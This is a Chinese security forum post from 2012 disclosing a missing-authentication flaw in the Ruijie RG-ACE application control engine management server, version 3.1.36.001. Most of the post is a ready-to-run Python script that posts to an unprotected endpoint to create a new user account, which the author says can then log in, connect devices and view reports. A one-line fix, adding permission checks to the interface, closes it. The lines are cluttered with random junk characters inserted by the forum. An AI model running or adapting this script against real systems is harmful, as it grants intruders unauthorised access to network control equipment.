找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2114|回复: 0
打印 上一主题 下一主题

锐捷应用控制引擎管理服务器可以增加用户

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:16:32 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
锐捷应用控制引擎管理服务器(RG-ACE系列应用控制引擎管理服务器V3.1.36.001,官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版)可以根据没有权限验证的接口直接增加用户,连接设备,查看设备信息和报表(权限相对于默认的admin比较低)1 Y# [+ e4 @5 f6 Q& U! F
4 _7 x0 D) c, p4 }7 z4 h
- T) C4 {0 y& R  |* j- _* q
测试的具体版本是/ _3 P, }: K! G4 w! B* y: A- m
产品名称: 锐捷应用控制引擎( o7 \0 @- k' M
版本号: 3.1.36.001 TC
, t, g; m$ t" [$ Z4 c0 |7 ~9 t编译时间: 201104291730- Z" f0 }( N) ^4 W

6 y3 `3 L( t# R& I
7 v7 d! z7 f+ V9 r漏洞证明:
0 k) C% }( q. g+ I/ O" W( m * F) j6 ^1 ~9 S8 {$ a. w

: T- k% W# i6 M3 h
4 y5 i$ U7 o, Q% u: E  w8 ]. V! M7 T! O& m! W8 H

& o6 |  N2 q* p0 K+ `) E' v) k0 N( z, z; B8 A' @
执行脚本
/ ]4 _$ ?+ b! W! v, H#! /usr/bin/env python
& y# z2 W" l4 C' i2 C4 z. f#coding=gbk
( N6 Z# S/ z4 T% g#RG-ACE管理服务器 V3.1.36.001
: t( [. V+ p6 ?# B" ~import urllib2, urllib,cookielib
  a% k& D% ~% o; Curl=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP' o& \; N* `, D' Q; K, E- N
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))- e+ ?) i, M9 _9 T% }$ e, y
opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]2 U1 Z! Z2 J* V9 O, P  @& U+ q
post=(("event","userManager.doInsertUserInfo"),
& d4 B. r4 Y% c( i: v("useractionname","addButtonValue"),
1 Z6 Q$ U4 g" ~, @  K6 I("useropermanager","userManager"),
5 P+ {( K: M5 k* @& J! k" Q' q("userName","t"), #######账号自己加
) k! r2 ~" Z7 l) }# v# a("pwd","aaaaaa"),######密码自己加
& b" F! M0 d, u5 A3 X$ U("trueName","ad"),7 t0 }* s* G: ]% ]" Q. m$ h
("email",""),
- U0 @/ c5 \' e2 t5 q4 i("mobilePhone",""),
  d5 y4 ?/ O) {8 ^4 d("officePhone",""),$ N& w, B0 l" H( V5 N/ ~
("addr",""),
( y3 H$ z* H9 z5 y/ [("submit","确定"))$ {1 X2 |( i$ z5 M) z! [
urllib2.install_opener(opener)5 D  T! E+ Z; z6 j: n
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
  _7 r: L3 ^+ |$ }0 ]print "Done"
$ Q! s- t: ?" U: O; j1 @
2 `! K* b2 L" d8 V登录,连接设备
3 q% [$ J' C6 r  U0 d+ n0 ~' w% A2 _) ~* c3 l5 D- h
# G" P% c% |/ _

: r! ]$ P  `- a4 @5 L
. _5 C( H4 G" @9 w) J" z
& k8 l0 ^, J8 Y* Y# J默认的管理员admin权限更大点/ M$ s6 c/ j' S2 S9 e( R' Q
8 ]% Q$ k2 Z! T2 j. F
8 [+ R. ]  x; r* _, V% ^
$ R, }8 [0 D  Q- `6 h4 i

  W  j6 V" ~- j* j3 s6 w# X0 T) Z# |& ~
修复方案:
5 B- Y$ W% Z  {: j: M: g3 G1 H$ t加强对接口的权限验证
- e& Z& r. `/ H" F* D" U$ D
6 i' {* U% ]2 @3 {: z8 l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表